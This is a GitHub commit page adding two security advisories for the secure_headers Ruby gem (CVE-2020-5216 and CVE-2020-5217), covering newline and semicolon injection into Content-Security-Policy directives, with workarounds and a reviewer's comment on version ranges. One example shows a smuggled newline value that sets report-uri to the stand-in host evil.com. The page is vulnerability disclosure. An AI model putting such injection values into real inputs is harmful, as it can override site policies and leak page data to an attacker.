-
-
Notifications
You must be signed in to change notification settings - Fork 216
Commit
- Loading branch information
There are no files selected for viewing
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,52 @@ | ||
--- | ||
gem: secure_headers | ||
cve: 2020-5216 | ||
ghsa: w978-rmpf-qmwg | ||
url: https://github.com/twitter/secure_headers/security/advisories/GHSA-w978-rmpf-qmwg | ||
date: 2020-01-23 | ||
title: secure_headers header injection due to newline | ||
description: |- | ||
If user-supplied input was passed into append/override_content_security_policy_directives, | ||
a newline could be injected leading to limited header injection. | ||
Upon seeing a newline in the header, rails will silently create a new Content-Security-Policy | ||
header with the remaining value of the original string. It will continue to create new headers | ||
for each newline. | ||
e.g. | ||
``` | ||
override_content_security_directives(script_src: ['mycdn.com', "\ninjected\n"]) | ||
``` | ||
would result in | ||
``` | ||
Content-Security-Policy: ... script-src: mycdn.com | ||
Content-Security-Policy: injected | ||
Content-Security-Policy: rest-of-the-header | ||
``` | ||
CSP supports multiple headers and all policies must be satisfied for execution to occur, but a malicious value that reports the current page is fairly trivial: | ||
``` | ||
override_content_security_directives(script_src: ["mycdn.com", "\ndefault-src 'none'; report-uri evil.com"]) | ||
``` | ||
``` | ||
Content-Security-Policy: ... script-src: mycdn.com | ||
Content-Security-Policy: default-src 'none'; report-uri evil.com | ||
Content-Security-Policy: rest-of-the-header | ||
``` | ||
Workarounds | ||
``` | ||
override_content_security_policy_directives(:frame_src, [user_input.gsub("\n", " ")]) | ||
``` | ||
cvss_v3: 4.4 | ||
|
||
patched_versions: | ||
- "~> 3.9.0" | ||
- "~> 5.2.0" | ||
- ">= 6.3.0" |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
--- | ||
gem: secure_headers | ||
cve: 2020-5217 | ||
ghsa: xq52-rv6w-397c | ||
url: https://github.com/twitter/secure_headers/security/advisories/GHSA-xq52-rv6w-397c | ||
date: 2020-01-23 | ||
title: secure_headers XXX | ||
description: |- | ||
If user-supplied input was passed into append/override_content_security_policy_directives, | ||
a semicolon could be injected leading to directive injection. | ||
This could be used to e.g. override a script-src directive. Duplicate directives are ignored | ||
and the first one wins. The directives in secure_headers are sorted alphabetically so they | ||
pretty much all come before script-src. A previously undefined directive would receive a value | ||
even if SecureHeaders::OPT_OUT was supplied. | ||
The fixed versions will silently convert the semicolons to spaces and emit a deprecation warning | ||
when this happens. This will result in innocuous browser console messages if being | ||
exploited/accidentally used. In future releases, we will raise application errors resulting in | ||
500s. | ||
> Duplicate script-src directives detected. All but the first instance will be ignored. | ||
See https://www.w3.org/TR/CSP3/#parse-serialized-policy | ||
> Note: In this case, the user agent SHOULD notify developers that a duplicate directive was | ||
> ignored. A console warning might be appropriate, for example. | ||
# Workarounds | ||
If you are passing user input into the above methods, you could filter out the input: | ||
``` | ||
override_content_security_policy_directives(:frame_src, [user_input.gsub(";", " ")]) | ||
``` | ||
cvss_v3: 4.4 | ||
|
||
patched_versions: | ||
- "~> 3.8.0" | ||
- "~> 5.1.0" | ||
This comment has been minimized.
Sorry, something went wrong.
This comment has been minimized.
Sorry, something went wrong.
reedloden
Author
Member
|
||
- ">= 6.2.0" |
I think this version specifier is not correct - it suggests 5.2.0 is vulnerable. Would
~> 5.1
be right?